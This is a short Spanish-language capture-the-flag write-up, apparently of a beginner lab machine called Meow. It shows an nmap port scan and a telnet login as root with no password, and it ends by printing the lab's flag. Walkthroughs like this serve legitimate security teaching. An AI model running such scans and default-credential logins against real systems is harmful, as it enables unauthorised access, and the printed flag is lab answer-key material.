~avz

administrando el sitio elpolla.net junto con su branding elpolla soluciones y telecomunicaciones 2025

Hacemos nmap, habiendo estudiado los [[Parámetros de nmap]] para elaborar un comando más eficiente. No necesitamos una resolución de hosts y sabemos que el host está activo en una VPN.

┌──(kali㉿kali)-[~]
└─$ nmap 10.129.1.17 -Pn -n --open -sS --min-rate 5000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-25 06:05 EDT
Nmap scan report for 10.129.1.17
Host is up (0.22s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
23/tcp open  telnet
┌──(kali㉿kali)-[~]
└─$ telnet 10.129.1.17
Trying 10.129.1.17...
Connected to 10.129.1.17.
Escape character is '^]'.

  █  █         ▐▌     ▄█▄ █          ▄▄▄▄
  █▄▄█ ▀▀█ █▀▀ ▐▌▄▀    █  █▀█ █▀█    █▌▄█ ▄▀▀▄ ▀▄▀
  █  █ █▄█ █▄▄ ▐█▀▄    █  █ █ █▄▄    █▌▄█ ▀▄▄▀ █▀█

Meow login: root

El login por defecto de telnet es root.

Last login: Mon Sep  6 15:15:23 UTC 2021 from 10.10.14.18 on pts/0
root@Meow:~# ls
flag.txt  snap
root@Meow:~# cat flag.txt
b40abdfe23665f766f9c61ecba8a4c19
root@Meow:~#